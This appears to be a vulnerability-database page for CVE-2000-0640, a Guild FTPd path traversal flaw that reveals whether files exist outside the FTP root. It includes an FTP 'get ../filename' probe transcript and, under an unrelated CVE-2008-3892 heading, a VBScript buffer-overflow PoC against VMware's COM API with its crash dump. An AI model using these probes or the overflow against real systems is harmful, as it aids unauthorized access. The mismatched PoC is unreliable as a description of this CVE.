CVE-2000-0640
published 2000-07-08CVE-2000-0640: Guild FTPd allows remote attackers to determine the existence of files outside the FTP root via a .. (dot dot) attack, which provides different error messages…
PriorityP432high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
7.07%
93.4th percentile
Guild FTPd allows remote attackers to determine the existence of files outside the FTP root via a .. (dot dot) attack, which provides different error messages depending on whether the file exists or not.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| steve_poulsen | guildftpd | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
VMware - COM API ActiveX Remote Buffer Overflow (PoC)
exploitdb·2008-09-01
CVE-2008-3892 VMware - COM API ActiveX Remote Buffer Overflow (PoC)
VMware - COM API ActiveX Remote Buffer Overflow (PoC)
---
VMWare COM API Buffer Overflow
url: http://www.vmware.com/
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.net
This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7
Sub tryMe
buff_1 = String (2000, "a")
buff_2 = String (2000, "b")
test.GuestInfo (buff_1) = buff_2
End Sub
Dump:
09:25:39.339 pid=0640 tid=0504 EXCEPTION (first-chance)
Exception C0000005 (ACCESS_VIOLATION reading [00000070])
EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
EBX=0012BE14: 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61
ECX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ??
Exploit-DB
DrPhibez and Nitro187 Guild FTPD 0.9.7 - File Existence Disclosure
exploitdb·2000-07-08
CVE-2000-0640 DrPhibez and Nitro187 Guild FTPD 0.9.7 - File Existence Disclosure
DrPhibez and Nitro187 Guild FTPD 0.9.7 - File Existence Disclosure
---
source: https://www.securityfocus.com/bid/1452/info
Guild Ftpd will not send files outside of the ftp root when they are specified by the ../ string in the path of the GET request. However due to the difference in the error messages it is able to determine if the file requested exists. The error message "Download failed" appears if the requested file exists and "Access denied" if it does not.
ftp> get ../filename
>PORT command successful.
>Opening ascii mode data connection for \../filename.
>Download failed.
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2000-07/0114.htmlhttp://www.osvdb.org/573http://www.securityfocus.com/bid/1452https://exchange.xforce.ibmcloud.com/vulnerabilities/4922http://archives.neohapsis.com/archives/bugtraq/2000-07/0114.htmlhttp://www.osvdb.org/573http://www.securityfocus.com/bid/1452https://exchange.xforce.ibmcloud.com/vulnerabilities/4922
2000-07-08
Published